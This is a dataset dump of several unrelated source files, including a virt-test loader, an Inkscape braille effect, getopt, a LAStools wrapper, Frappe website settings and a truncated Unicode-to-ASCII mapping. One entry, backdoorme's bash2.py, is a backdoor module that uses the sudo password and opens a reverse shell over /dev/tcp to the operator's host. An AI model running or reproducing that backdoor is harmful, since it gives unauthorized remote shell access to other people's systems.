repo_name
stringlengths 6
100
| path
stringlengths 4
294
| copies
stringlengths 1
5
| size
stringlengths 4
6
| content
stringlengths 606
896k
| license
stringclasses 15
values | var_hash
int64 -9,223,186,179,200,150,000
9,223,291,175B
| doc_hash
int64 -9,223,304,365,658,930,000
9,223,309,051B
| line_mean
float64 3.5
99.8
| line_max
int64 13
999
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|
sathnaga/virt-test | tools/common.py | 12 | 1426 | import os, sys
def load_setup_modules(client_dir):
try:
sys.path.insert(0, client_dir)
import setup_modules
finally:
sys.path.pop(0)
return setup_modules
dirname = os.path.dirname(sys.modules[__name__].__file__)
virt_test_dir = os.path.abspath(os.path.join(dirname, ".."))
sys.path.insert(0, virt_test_dir)
try:
import autotest.client.setup_modules as setup_modules
client_dir = os.path.dirname(setup_modules.__file__)
sm = setup_modules
except ImportError:
try:
client_dir = os.path.abspath(os.path.join(dirname, "..", "..", ".."))
sm = load_setup_modules(client_dir)
except:
try:
client_dir = os.path.join(os.environ['AUTOTEST_PATH'], 'client')
except KeyError:
print("Environment variable $AUTOTEST_PATH not set. "
"please set it to a path containing an autotest checkout")
print("Or install the autotest-framework package for your distro")
sys.exit(1)
if not os.path.isdir(client_dir):
print('Autotest client library directory was not found at: "%s"' %
client_dir)
print('Please check if the environment variable "$AUTOTEST_PATH" '
'points to a valid location')
sys.exit(1)
sm = load_setup_modules(client_dir)
sm.setup(base_path=client_dir, root_module_name="autotest.client")
| gpl-2.0 | 3,440,179,515,862,722,000 | 8,432,146,919,563,892,000 | 36.526316 | 78 | 0.612202 | false |
sovaa/backdoorme | backdoors/shell/bash2.py | 1 | 1323 | from backdoors.backdoor import *
import subprocess
import threading
class Bash2(Backdoor):
prompt = Fore.RED + "(bash) " + Fore.BLUE + ">> " + Fore.RESET
def __init__(self, core):
cmd.Cmd.__init__(self)
self.intro = GOOD + "Using second Bash module..."
self.core = core
self.options = {
"port" : Option("port", 53923, "port to connect to", True),
}
self.allow_modules = True
self.modules = {}
self.help_text = INFO + "A slightly different (and more reliable) version of the other bash backdoor, which does not prompt for the password on the client-side."
def get_command(self):
return "echo " + self.core.curtarget.pword + " | sudo -S nohup 0<&196;exec 196<>/dev/tcp/" + self.core.localIP + "/%s; sh <&196 >&196 2>&196" % self.get_value("port")
def do_exploit(self, args):
port = self.get_value("port")
target = self.core.curtarget
print(GOOD + "Initializing backdoor...")
input("Run the following command: nc -vnlp %s in another shell to start the listener." % port)
target.ssh.exec_command(self.get_command())
for mod in self.modules.keys():
print(INFO + "Attempting to execute " + mod.name + " module...")
mod.exploit()
| mit | 205,024,602,839,075,650 | 2,466,526,990,982,905,300 | 41.677419 | 174 | 0.589569 | false |
tik0/inkscapeGrid | share/extensions/text_braille.py | 6 | 1177 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import chardataeffect, inkex, string
convert_table = {\
'a': unicode("⠁", "utf-8"),\
'b': unicode("⠃", "utf-8"),\
'c': unicode("⠉", "utf-8"),\
'd': unicode("⠙", "utf-8"),\
'e': unicode("⠑", "utf-8"),\
'f': unicode("⠋", "utf-8"),\
'g': unicode("⠛", "utf-8"),\
'h': unicode("⠓", "utf-8"),\
'i': unicode("⠊", "utf-8"),\
'j': unicode("⠚", "utf-8"),\
'k': unicode("⠅", "utf-8"),\
'l': unicode("⠇", "utf-8"),\
'm': unicode("⠍", "utf-8"),\
'n': unicode("⠝", "utf-8"),\
'o': unicode("⠕", "utf-8"),\
'p': unicode("⠏", "utf-8"),\
'q': unicode("⠟", "utf-8"),\
'r': unicode("⠗", "utf-8"),\
's': unicode("⠎", "utf-8"),\
't': unicode("⠞", "utf-8"),\
'u': unicode("⠥", "utf-8"),\
'v': unicode("⠧", "utf-8"),\
'w': unicode("⠺", "utf-8"),\
'x': unicode("⠭", "utf-8"),\
'y': unicode("⠽", "utf-8"),\
'z': unicode("⠵", "utf-8"),\
}
class C(chardataeffect.CharDataEffect):
def process_chardata(self,text, line, par):
r = ""
for c in text:
if convert_table.has_key(c.lower()):
r = r + convert_table[c.lower()]
else:
r = r + c
return r
c = C()
c.affect()
| gpl-2.0 | -6,977,646,690,398,901,000 | 7,531,656,661,442,428,000 | 22.93617 | 45 | 0.468444 | false |
40223110/2015CDAFinal_test2 | static/Brython3.1.0-20150301-090019/Lib/getopt.py | 845 | 7488 | """Parser for command line options.
This module helps scripts to parse the command line arguments in
sys.argv. It supports the same conventions as the Unix getopt()
function (including the special meanings of arguments of the form `-'
and `--'). Long options similar to those supported by GNU software
may be used as well via an optional third argument. This module
provides two functions and an exception:
getopt() -- Parse command line options
gnu_getopt() -- Like getopt(), but allow option and non-option arguments
to be intermixed.
GetoptError -- exception (class) raised with 'opt' attribute, which is the
option involved with the exception.
"""
# Long option support added by Lars Wirzenius <[email protected]>.
#
# Gerrit Holl <[email protected]> moved the string-based exceptions
# to class-based exceptions.
#
# Peter Åstrand <[email protected]> added gnu_getopt().
#
# TODO for gnu_getopt():
#
# - GNU getopt_long_only mechanism
# - allow the caller to specify ordering
# - RETURN_IN_ORDER option
# - GNU extension with '-' as first character of option string
# - optional arguments, specified by double colons
# - a option string with a W followed by semicolon should
# treat "-W foo" as "--foo"
__all__ = ["GetoptError","error","getopt","gnu_getopt"]
import os
try:
from gettext import gettext as _
except ImportError:
# Bootstrapping Python: gettext's dependencies not built yet
def _(s): return s
class GetoptError(Exception):
opt = ''
msg = ''
def __init__(self, msg, opt=''):
self.msg = msg
self.opt = opt
Exception.__init__(self, msg, opt)
def __str__(self):
return self.msg
error = GetoptError # backward compatibility
def getopt(args, shortopts, longopts = []):
"""getopt(args, options[, long_options]) -> opts, args
Parses command line options and parameter list. args is the
argument list to be parsed, without the leading reference to the
running program. Typically, this means "sys.argv[1:]". shortopts
is the string of option letters that the script wants to
recognize, with options that require an argument followed by a
colon (i.e., the same format that Unix getopt() uses). If
specified, longopts is a list of strings with the names of the
long options which should be supported. The leading '--'
characters should not be included in the option name. Options
which require an argument should be followed by an equal sign
('=').
The return value consists of two elements: the first is a list of
(option, value) pairs; the second is the list of program arguments
left after the option list was stripped (this is a trailing slice
of the first argument). Each option-and-value pair returned has
the option as its first element, prefixed with a hyphen (e.g.,
'-x'), and the option argument as its second element, or an empty
string if the option has no argument. The options occur in the
list in the same order in which they were found, thus allowing
multiple occurrences. Long and short options may be mixed.
"""
opts = []
if type(longopts) == type(""):
longopts = [longopts]
else:
longopts = list(longopts)
while args and args[0].startswith('-') and args[0] != '-':
if args[0] == '--':
args = args[1:]
break
if args[0].startswith('--'):
opts, args = do_longs(opts, args[0][2:], longopts, args[1:])
else:
opts, args = do_shorts(opts, args[0][1:], shortopts, args[1:])
return opts, args
def gnu_getopt(args, shortopts, longopts = []):
"""getopt(args, options[, long_options]) -> opts, args
This function works like getopt(), except that GNU style scanning
mode is used by default. This means that option and non-option
arguments may be intermixed. The getopt() function stops
processing options as soon as a non-option argument is
encountered.
If the first character of the option string is `+', or if the
environment variable POSIXLY_CORRECT is set, then option
processing stops as soon as a non-option argument is encountered.
"""
opts = []
prog_args = []
if isinstance(longopts, str):
longopts = [longopts]
else:
longopts = list(longopts)
# Allow options after non-option arguments?
if shortopts.startswith('+'):
shortopts = shortopts[1:]
all_options_first = True
elif os.environ.get("POSIXLY_CORRECT"):
all_options_first = True
else:
all_options_first = False
while args:
if args[0] == '--':
prog_args += args[1:]
break
if args[0][:2] == '--':
opts, args = do_longs(opts, args[0][2:], longopts, args[1:])
elif args[0][:1] == '-' and args[0] != '-':
opts, args = do_shorts(opts, args[0][1:], shortopts, args[1:])
else:
if all_options_first:
prog_args += args
break
else:
prog_args.append(args[0])
args = args[1:]
return opts, prog_args
def do_longs(opts, opt, longopts, args):
try:
i = opt.index('=')
except ValueError:
optarg = None
else:
opt, optarg = opt[:i], opt[i+1:]
has_arg, opt = long_has_args(opt, longopts)
if has_arg:
if optarg is None:
if not args:
raise GetoptError(_('option --%s requires argument') % opt, opt)
optarg, args = args[0], args[1:]
elif optarg is not None:
raise GetoptError(_('option --%s must not have an argument') % opt, opt)
opts.append(('--' + opt, optarg or ''))
return opts, args
# Return:
# has_arg?
# full option name
def long_has_args(opt, longopts):
possibilities = [o for o in longopts if o.startswith(opt)]
if not possibilities:
raise GetoptError(_('option --%s not recognized') % opt, opt)
# Is there an exact match?
if opt in possibilities:
return False, opt
elif opt + '=' in possibilities:
return True, opt
# No exact match, so better be unique.
if len(possibilities) > 1:
# XXX since possibilities contains all valid continuations, might be
# nice to work them into the error msg
raise GetoptError(_('option --%s not a unique prefix') % opt, opt)
assert len(possibilities) == 1
unique_match = possibilities[0]
has_arg = unique_match.endswith('=')
if has_arg:
unique_match = unique_match[:-1]
return has_arg, unique_match
def do_shorts(opts, optstring, shortopts, args):
while optstring != '':
opt, optstring = optstring[0], optstring[1:]
if short_has_arg(opt, shortopts):
if optstring == '':
if not args:
raise GetoptError(_('option -%s requires argument') % opt,
opt)
optstring, args = args[0], args[1:]
optarg, optstring = optstring, ''
else:
optarg = ''
opts.append(('-' + opt, optarg))
return opts, args
def short_has_arg(opt, shortopts):
for i in range(len(shortopts)):
if opt == shortopts[i] != ':':
return shortopts.startswith(':', i+1)
raise GetoptError(_('option -%s not recognized') % opt, opt)
if __name__ == '__main__':
import sys
print(getopt(sys.argv[1:], "a:b", ["alpha=", "beta"]))
| gpl-3.0 | -1,776,446,679,771,228,000 | -50,132,874,874,108,470 | 33.823256 | 80 | 0.620008 | false |
SebDieBln/QGIS | python/plugins/processing/algs/lidar/lastools/lasthin.py | 12 | 3757 | # -*- coding: utf-8 -*-
"""
***************************************************************************
lasthin.py
---------------------
Date : September 2013
Copyright : (C) 2013 by Martin Isenburg
Email : martin near rapidlasso point com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Martin Isenburg'
__date__ = 'September 2013'
__copyright__ = '(C) 2013, Martin Isenburg'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from LAStoolsUtils import LAStoolsUtils
from LAStoolsAlgorithm import LAStoolsAlgorithm
from processing.core.parameters import ParameterBoolean
from processing.core.parameters import ParameterNumber
from processing.core.parameters import ParameterSelection
class lasthin(LAStoolsAlgorithm):
THIN_STEP = "THIN_STEP"
OPERATION = "OPERATION"
OPERATIONS = ["lowest", "random", "highest"]
WITHHELD = "WITHHELD"
CLASSIFY_AS = "CLASSIFY_AS"
CLASSIFY_AS_CLASS = "CLASSIFY_AS_CLASS"
def defineCharacteristics(self):
self.name, self.i18n_name = self.trAlgorithm('lasthin')
self.group, self.i18n_group = self.trAlgorithm('LAStools')
self.addParametersVerboseGUI()
self.addParametersPointInputGUI()
self.addParameter(ParameterNumber(lasthin.THIN_STEP,
self.tr("size of grid used for thinning"), 0, None, 1.0))
self.addParameter(ParameterSelection(lasthin.OPERATION,
self.tr("keep particular point per cell"), lasthin.OPERATIONS, 0))
self.addParameter(ParameterBoolean(lasthin.WITHHELD,
self.tr("mark thinned-away points as withheld"), False))
self.addParameter(ParameterBoolean(lasthin.CLASSIFY_AS,
self.tr("classify surviving points as class"), False))
self.addParameter(ParameterNumber(lasthin.CLASSIFY_AS_CLASS,
self.tr("class"), 0, None, 8))
self.addParametersPointOutputGUI()
self.addParametersAdditionalGUI()
def processAlgorithm(self, progress):
commands = [os.path.join(LAStoolsUtils.LAStoolsPath(), "bin", "lasthin")]
self.addParametersVerboseCommands(commands)
self.addParametersPointInputCommands(commands)
step = self.getParameterValue(lasthin.THIN_STEP)
if step != 0.0:
commands.append("-step")
commands.append(unicode(step))
operation = self.getParameterValue(lasthin.OPERATION)
if operation != 0:
commands.append("-" + self.OPERATIONS[operation])
if self.getParameterValue(lasthin.WITHHELD):
commands.append("-withheld")
if self.getParameterValue(lasthin.CLASSIFY_AS):
commands.append("-classify_as")
commands.append(unicode(self.getParameterValue(lasthin.CLASSIFY_AS_CLASS)))
self.addParametersPointOutputCommands(commands)
self.addParametersAdditionalCommands(commands)
LAStoolsUtils.runLAStools(commands, progress)
| gpl-2.0 | 5,616,160,028,502,209,000 | 594,594,614,412,359,000 | 45.382716 | 111 | 0.573064 | false |
indictranstech/reciphergroup-frappe | frappe/website/doctype/website_settings/website_settings.py | 27 | 4297 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.utils import get_request_site_address, encode
from frappe.model.document import Document
from urllib import quote
from frappe.website.router import resolve_route
from frappe.website.doctype.website_theme.website_theme import add_website_theme
class WebsiteSettings(Document):
def validate(self):
self.validate_top_bar_items()
self.validate_footer_items()
self.validate_home_page()
def validate_home_page(self):
if frappe.flags.in_install:
return
if self.home_page and not resolve_route(self.home_page):
frappe.msgprint(_("Invalid Home Page") + " (Standard pages - index, login, products, blog, about, contact)")
self.home_page = ''
def validate_top_bar_items(self):
"""validate url in top bar items"""
for top_bar_item in self.get("top_bar_items"):
if top_bar_item.parent_label:
parent_label_item = self.get("top_bar_items", {"label": top_bar_item.parent_label})
if not parent_label_item:
# invalid item
frappe.throw(_("{0} does not exist in row {1}").format(top_bar_item.parent_label, top_bar_item.idx))
elif not parent_label_item[0] or parent_label_item[0].url:
# parent cannot have url
frappe.throw(_("{0} in row {1} cannot have both URL and child items").format(top_bar_item.parent_label,
top_bar_item.idx))
def validate_footer_items(self):
"""clear parent label in footer"""
for footer_item in self.get("footer_items"):
footer_item.parent_label = None
def on_update(self):
self.clear_cache()
def clear_cache(self):
# make js and css
# clear web cache (for menus!)
from frappe.sessions import clear_cache
clear_cache('Guest')
from frappe.website.render import clear_cache
clear_cache()
# clears role based home pages
frappe.clear_cache()
def get_website_settings():
hooks = frappe.get_hooks()
all_top_items = frappe.db.sql("""\
select * from `tabTop Bar Item`
where parent='Website Settings' and parentfield='top_bar_items'
order by idx asc""", as_dict=1)
top_items = [d for d in all_top_items if not d['parent_label']]
# attach child items to top bar
for d in all_top_items:
if d['parent_label']:
for t in top_items:
if t['label']==d['parent_label']:
if not 'child_items' in t:
t['child_items'] = []
t['child_items'].append(d)
break
context = frappe._dict({
'top_bar_items': top_items,
'footer_items': frappe.db.sql("""\
select * from `tabTop Bar Item`
where parent='Website Settings' and parentfield='footer_items'
order by idx asc""", as_dict=1),
"post_login": [
{"label": "My Account", "url": "/me"},
{"class": "divider"},
{"label": "Logout", "url": "/?cmd=web_logout"}
]
})
settings = frappe.get_doc("Website Settings", "Website Settings")
for k in ["banner_html", "brand_html", "copyright", "twitter_share_via",
"facebook_share", "google_plus_one", "twitter_share", "linked_in_share",
"disable_signup", "hide_footer_signup", "head_html"]:
if hasattr(settings, k):
context[k] = settings.get(k)
if settings.address:
context["footer_address"] = settings.address
for k in ["facebook_share", "google_plus_one", "twitter_share", "linked_in_share",
"disable_signup"]:
context[k] = int(context.get(k) or 0)
if frappe.request:
context.url = quote(str(get_request_site_address(full_address=True)), safe="/:")
context.encoded_title = quote(encode(context.title or ""), str(""))
for update_website_context in hooks.update_website_context or []:
frappe.get_attr(update_website_context)(context)
context.web_include_js = hooks.web_include_js or []
context.web_include_css = hooks.web_include_css or []
via_hooks = frappe.get_hooks("website_context")
for key in via_hooks:
context[key] = via_hooks[key]
if key not in ("top_bar_items", "footer_items", "post_login") \
and isinstance(context[key], (list, tuple)):
context[key] = context[key][0]
add_website_theme(context)
if not context.get("favicon"):
context["favicon"] = "/assets/frappe/images/favicon.png"
if settings.favicon and settings.favicon != "attach_files:":
context["favicon"] = settings.favicon
return context
| mit | -7,714,535,708,371,818,000 | 3,703,330,806,336,435,700 | 30.364964 | 111 | 0.685595 | false |
hzlf/openbroadcast.org | website/base/utils/fold_to_ascii/mapping.py | 2 | 27241 | # -*- coding: utf-8 -*-
"""
Mappings suitable for translate tables.
"""
# To see printed representation of character `k`:
# print(unichr(k))
#
# ASCII characters replace to themselves.
codepoint_to_self = [
(0x0, u"\x00"),
(0x1, u"\x01"),
(0x2, u"\x02"),
(0x3, u"\x03"),
(0x4, u"\x04"),
(0x5, u"\x05"),
(0x6, u"\x06"),
(0x7, u"\x07"),
(0x8, u"\x08"),
(0x9, u"\t"),
(0xA, u"\n"),
(0xB, u"\x0b"),
(0xC, u"\x0c"),
(0xD, u"\r"),
(0xE, u"\x0e"),
(0xF, u"\x0f"),
(0x10, u"\x10"),
(0x11, u"\x11"),
(0x12, u"\x12"),
(0x13, u"\x13"),
(0x14, u"\x14"),
(0x15, u"\x15"),
(0x16, u"\x16"),
(0x17, u"\x17"),
(0x18, u"\x18"),
(0x19, u"\x19"),
(0x1A, u"\x1a"),
(0x1B, u"\x1b"),
(0x1C, u"\x1c"),
(0x1D, u"\x1d"),
(0x1E, u"\x1e"),
(0x1F, u"\x1f"),
(0x20, u" "),
(0x21, u"!"),
(0x22, u'"'),
(0x23, u"#"),
(0x24, u"$"),
(0x25, u"%"),
(0x26, u"&"),
(0x27, u"'"),
(0x28, u"("),
(0x29, u")"),
(0x2A, u"*"),
(0x2B, u"+"),
(0x2C, u","),
(0x2D, u"-"),
(0x2E, u"."),
(0x2F, u"/"),
(0x30, u"0"),
(0x31, u"1"),
(0x32, u"2"),
(0x33, u"3"),
(0x34, u"4"),
(0x35, u"5"),
(0x36, u"6"),
(0x37, u"7"),
(0x38, u"8"),
(0x39, u"9"),
(0x3A, u":"),
(0x3B, u";"),
(0x3C, u"<"),
(0x3D, u"="),
(0x3E, u">"),
(0x3F, u"?"),
(0x40, u"@"),
(0x41, u"A"),
(0x42, u"B"),
(0x43, u"C"),
(0x44, u"D"),
(0x45, u"E"),
(0x46, u"F"),
(0x47, u"G"),
(0x48, u"H"),
(0x49, u"I"),
(0x4A, u"J"),
(0x4B, u"K"),
(0x4C, u"L"),
(0x4D, u"M"),
(0x4E, u"N"),
(0x4F, u"O"),
(0x50, u"P"),
(0x51, u"Q"),
(0x52, u"R"),
(0x53, u"S"),
(0x54, u"T"),
(0x55, u"U"),
(0x56, u"V"),
(0x57, u"W"),
(0x58, u"X"),
(0x59, u"Y"),
(0x5A, u"Z"),
(0x5B, u"["),
(0x5C, u"\\"),
(0x5D, u"]"),
(0x5E, u"^"),
(0x5F, u"_"),
(0x60, u"`"),
(0x61, u"a"),
(0x62, u"b"),
(0x63, u"c"),
(0x64, u"d"),
(0x65, u"e"),
(0x66, u"f"),
(0x67, u"g"),
(0x68, u"h"),
(0x69, u"i"),
(0x6A, u"j"),
(0x6B, u"k"),
(0x6C, u"l"),
(0x6D, u"m"),
(0x6E, u"n"),
(0x6F, u"o"),
(0x70, u"p"),
(0x71, u"q"),
(0x72, u"r"),
(0x73, u"s"),
(0x74, u"t"),
(0x75, u"u"),
(0x76, u"v"),
(0x77, u"w"),
(0x78, u"x"),
(0x79, u"y"),
(0x7A, u"z"),
(0x7B, u"{"),
(0x7C, u"|"),
(0x7D, u"}"),
(0x7E, u"~"),
]
codepoint_to_replacement = [
(0xC0, u"A"),
(0xC1, u"A"),
(0xC2, u"A"),
(0xC3, u"A"),
(0xC4, u"A"),
(0xC5, u"A"),
(0x100, u"A"),
(0x102, u"A"),
(0x104, u"A"),
(0x18F, u"A"),
(0x1CD, u"A"),
(0x1DE, u"A"),
(0x1E0, u"A"),
(0x1FA, u"A"),
(0x200, u"A"),
(0x202, u"A"),
(0x226, u"A"),
(0x23A, u"A"),
(0x1D00, u"A"),
(0x1E00, u"A"),
(0x1EA0, u"A"),
(0x1EA2, u"A"),
(0x1EA4, u"A"),
(0x1EA6, u"A"),
(0x1EA8, u"A"),
(0x1EAA, u"A"),
(0x1EAC, u"A"),
(0x1EAE, u"A"),
(0x1EB0, u"A"),
(0x1EB2, u"A"),
(0x1EB4, u"A"),
(0x1EB6, u"A"),
(0x24B6, u"A"),
(0xFF21, u"A"),
(0xE0, u"a"),
(0xE1, u"a"),
(0xE2, u"a"),
(0xE3, u"a"),
(0xE4, u"a"),
(0xE5, u"a"),
(0x101, u"a"),
(0x103, u"a"),
(0x105, u"a"),
(0x1CE, u"a"),
(0x1DF, u"a"),
(0x1E1, u"a"),
(0x1FB, u"a"),
(0x201, u"a"),
(0x203, u"a"),
(0x227, u"a"),
(0x250, u"a"),
(0x259, u"a"),
(0x25A, u"a"),
(0x1D8F, u"a"),
(0x1D95, u"a"),
(0x1E01, u"a"),
(0x1E9A, u"a"),
(0x1EA1, u"a"),
(0x1EA3, u"a"),
(0x1EA5, u"a"),
(0x1EA7, u"a"),
(0x1EA9, u"a"),
(0x1EAB, u"a"),
(0x1EAD, u"a"),
(0x1EAF, u"a"),
(0x1EB1, u"a"),
(0x1EB3, u"a"),
(0x1EB5, u"a"),
(0x1EB7, u"a"),
(0x2090, u"a"),
(0x2094, u"a"),
(0x24D0, u"a"),
(0x2C65, u"a"),
(0x2C6F, u"a"),
(0xFF41, u"a"),
(0xA732, u"AA"),
(0xC6, u"AE"),
(0x1E2, u"AE"),
(0x1FC, u"AE"),
(0x1D01, u"AE"),
(0xA734, u"AO"),
(0xA736, u"AU"),
(0xA738, u"AV"),
(0xA73A, u"AV"),
(0xA73C, u"AY"),
(0x249C, u"(a)"),
(0xA733, u"aa"),
(0xE6, u"ae"),
(0x1E3, u"ae"),
(0x1FD, u"ae"),
(0x1D02, u"ae"),
(0xA735, u"ao"),
(0xA737, u"au"),
(0xA739, u"av"),
(0xA73B, u"av"),
(0xA73D, u"ay"),
(0x181, u"B"),
(0x182, u"B"),
(0x243, u"B"),
(0x299, u"B"),
(0x1D03, u"B"),
(0x1E02, u"B"),
(0x1E04, u"B"),
(0x1E06, u"B"),
(0x24B7, u"B"),
(0xFF22, u"B"),
(0x180, u"b"),
(0x183, u"b"),
(0x253, u"b"),
(0x1D6C, u"b"),
(0x1D80, u"b"),
(0x1E03, u"b"),
(0x1E05, u"b"),
(0x1E07, u"b"),
(0x24D1, u"b"),
(0xFF42, u"b"),
(0x249D, u"(b)"),
(0xC7, u"C"),
(0x106, u"C"),
(0x108, u"C"),
(0x10A, u"C"),
(0x10C, u"C"),
(0x187, u"C"),
(0x23B, u"C"),
(0x297, u"C"),
(0x1D04, u"C"),
(0x1E08, u"C"),
(0x24B8, u"C"),
(0xFF23, u"C"),
(0xE7, u"c"),
(0x107, u"c"),
(0x109, u"c"),
(0x10B, u"c"),
(0x10D, u"c"),
(0x188, u"c"),
(0x23C, u"c"),
(0x255, u"c"),
(0x1E09, u"c"),
(0x2184, u"c"),
(0x24D2, u"c"),
(0xA73E, u"c"),
(0xA73F, u"c"),
(0xFF43, u"c"),
(0x249E, u"(c)"),
(0xD0, u"D"),
(0x10E, u"D"),
(0x110, u"D"),
(0x189, u"D"),
(0x18A, u"D"),
(0x18B, u"D"),
(0x1D05, u"D"),
(0x1D06, u"D"),
(0x1E0A, u"D"),
(0x1E0C, u"D"),
(0x1E0E, u"D"),
(0x1E10, u"D"),
(0x1E12, u"D"),
(0x24B9, u"D"),
(0xA779, u"D"),
(0xFF24, u"D"),
(0xF0, u"d"),
(0x10F, u"d"),
(0x111, u"d"),
(0x18C, u"d"),
(0x221, u"d"),
(0x256, u"d"),
(0x257, u"d"),
(0x1D6D, u"d"),
(0x1D81, u"d"),
(0x1D91, u"d"),
(0x1E0B, u"d"),
(0x1E0D, u"d"),
(0x1E0F, u"d"),
(0x1E11, u"d"),
(0x1E13, u"d"),
(0x24D3, u"d"),
(0xA77A, u"d"),
(0xFF44, u"d"),
(0x1C4, u"DZ"),
(0x1F1, u"DZ"),
(0x1C5, u"Dz"),
(0x1F2, u"Dz"),
(0x249F, u"(d)"),
(0x238, u"db"),
(0x1C6, u"dz"),
(0x1F3, u"dz"),
(0x2A3, u"dz"),
(0x2A5, u"dz"),
(0xC8, u"E"),
(0xC9, u"E"),
(0xCA, u"E"),
(0xCB, u"E"),
(0x112, u"E"),
(0x114, u"E"),
(0x116, u"E"),
(0x118, u"E"),
(0x11A, u"E"),
(0x18E, u"E"),
(0x190, u"E"),
(0x204, u"E"),
(0x206, u"E"),
(0x228, u"E"),
(0x246, u"E"),
(0x1D07, u"E"),
(0x1E14, u"E"),
(0x1E16, u"E"),
(0x1E18, u"E"),
(0x1E1A, u"E"),
(0x1E1C, u"E"),
(0x1EB8, u"E"),
(0x1EBA, u"E"),
(0x1EBC, u"E"),
(0x1EBE, u"E"),
(0x1EC0, u"E"),
(0x1EC2, u"E"),
(0x1EC4, u"E"),
(0x1EC6, u"E"),
(0x24BA, u"E"),
(0x2C7B, u"E"),
(0xFF25, u"E"),
(0xE8, u"e"),
(0xE9, u"e"),
(0xEA, u"e"),
(0xEB, u"e"),
(0x113, u"e"),
(0x115, u"e"),
(0x117, u"e"),
(0x119, u"e"),
(0x11B, u"e"),
(0x1DD, u"e"),
(0x205, u"e"),
(0x207, u"e"),
(0x229, u"e"),
(0x247, u"e"),
(0x258, u"e"),
(0x25B, u"e"),
(0x25C, u"e"),
(0x25D, u"e"),
(0x25E, u"e"),
(0x29A, u"e"),
(0x1D08, u"e"),
(0x1D92, u"e"),
(0x1D93, u"e"),
(0x1D94, u"e"),
(0x1E15, u"e"),
(0x1E17, u"e"),
(0x1E19, u"e"),
(0x1E1B, u"e"),
(0x1E1D, u"e"),
(0x1EB9, u"e"),
(0x1EBB, u"e"),
(0x1EBD, u"e"),
(0x1EBF, u"e"),
(0x1EC1, u"e"),
(0x1EC3, u"e"),
(0x1EC5, u"e"),
(0x1EC7, u"e"),
(0x2091, u"e"),
(0x24D4, u"e"),
(0x2C78, u"e"),
(0xFF45, u"e"),
(0x24A0, u"(e)"),
(0x191, u"F"),
(0x1E1E, u"F"),
(0x24BB, u"F"),
(0xA730, u"F"),
(0xA77B, u"F"),
(0xA7FB, u"F"),
(0xFF26, u"F"),
(0x192, u"f"),
(0x1D6E, u"f"),
(0x1D82, u"f"),
(0x1E1F, u"f"),
(0x1E9B, u"f"),
(0x24D5, u"f"),
(0xA77C, u"f"),
(0xFF46, u"f"),
(0x24A1, u"(f)"),
(0xFB00, u"ff"),
(0xFB03, u"ffi"),
(0xFB04, u"ffl"),
(0xFB01, u"fi"),
(0xFB02, u"fl"),
(0x11C, u"G"),
(0x11E, u"G"),
(0x120, u"G"),
(0x122, u"G"),
(0x193, u"G"),
(0x1E4, u"G"),
(0x1E5, u"G"),
(0x1E6, u"G"),
(0x1E7, u"G"),
(0x1F4, u"G"),
(0x262, u"G"),
(0x29B, u"G"),
(0x1E20, u"G"),
(0x24BC, u"G"),
(0xA77D, u"G"),
(0xA77E, u"G"),
(0xFF27, u"G"),
(0x11D, u"g"),
(0x11F, u"g"),
(0x121, u"g"),
(0x123, u"g"),
(0x1F5, u"g"),
(0x260, u"g"),
(0x261, u"g"),
(0x1D77, u"g"),
(0x1D79, u"g"),
(0x1D83, u"g"),
(0x1E21, u"g"),
(0x24D6, u"g"),
(0xA77F, u"g"),
(0xFF47, u"g"),
(0x24A2, u"(g)"),
(0x124, u"H"),
(0x126, u"H"),
(0x21E, u"H"),
(0x29C, u"H"),
(0x1E22, u"H"),
(0x1E24, u"H"),
(0x1E26, u"H"),
(0x1E28, u"H"),
(0x1E2A, u"H"),
(0x24BD, u"H"),
(0x2C67, u"H"),
(0x2C75, u"H"),
(0xFF28, u"H"),
(0x125, u"h"),
(0x127, u"h"),
(0x21F, u"h"),
(0x265, u"h"),
(0x266, u"h"),
(0x2AE, u"h"),
(0x2AF, u"h"),
(0x1E23, u"h"),
(0x1E25, u"h"),
(0x1E27, u"h"),
(0x1E29, u"h"),
(0x1E2B, u"h"),
(0x1E96, u"h"),
(0x24D7, u"h"),
(0x2C68, u"h"),
(0x2C76, u"h"),
(0xFF48, u"h"),
(0x1F6, u"HV"),
(0x24A3, u"(h)"),
(0x195, u"hv"),
(0xCC, u"I"),
(0xCD, u"I"),
(0xCE, u"I"),
(0xCF, u"I"),
(0x128, u"I"),
(0x12A, u"I"),
(0x12C, u"I"),
(0x12E, u"I"),
(0x130, u"I"),
(0x196, u"I"),
(0x197, u"I"),
(0x1CF, u"I"),
(0x208, u"I"),
(0x20A, u"I"),
(0x26A, u"I"),
(0x1D7B, u"I"),
(0x1E2C, u"I"),
(0x1E2E, u"I"),
(0x1EC8, u"I"),
(0x1ECA, u"I"),
(0x24BE, u"I"),
(0xA7FE, u"I"),
(0xFF29, u"I"),
(0xEC, u"i"),
(0xED, u"i"),
(0xEE, u"i"),
(0xEF, u"i"),
(0x129, u"i"),
(0x12B, u"i"),
(0x12D, u"i"),
(0x12F, u"i"),
(0x131, u"i"),
(0x1D0, u"i"),
(0x209, u"i"),
(0x20B, u"i"),
(0x268, u"i"),
(0x1D09, u"i"),
(0x1D62, u"i"),
(0x1D7C, u"i"),
(0x1D96, u"i"),
(0x1E2D, u"i"),
(0x1E2F, u"i"),
(0x1EC9, u"i"),
(0x1ECB, u"i"),
(0x2071, u"i"),
(0x24D8, u"i"),
(0xFF49, u"i"),
(0x132, u"IJ"),
(0x24A4, u"(i)"),
(0x133, u"ij"),
(0x134, u"J"),
(0x248, u"J"),
(0x1D0A, u"J"),
(0x24BF, u"J"),
(0xFF2A, u"J"),
(0x135, u"j"),
(0x1F0, u"j"),
(0x237, u"j"),
(0x249, u"j"),
(0x25F, u"j"),
(0x284, u"j"),
(0x29D, u"j"),
(0x24D9, u"j"),
(0x2C7C, u"j"),
(0xFF4A, u"j"),
(0x24A5, u"(j)"),
(0x136, u"K"),
(0x198, u"K"),
(0x1E8, u"K"),
(0x1D0B, u"K"),
(0x1E30, u"K"),
(0x1E32, u"K"),
(0x1E34, u"K"),
(0x24C0, u"K"),
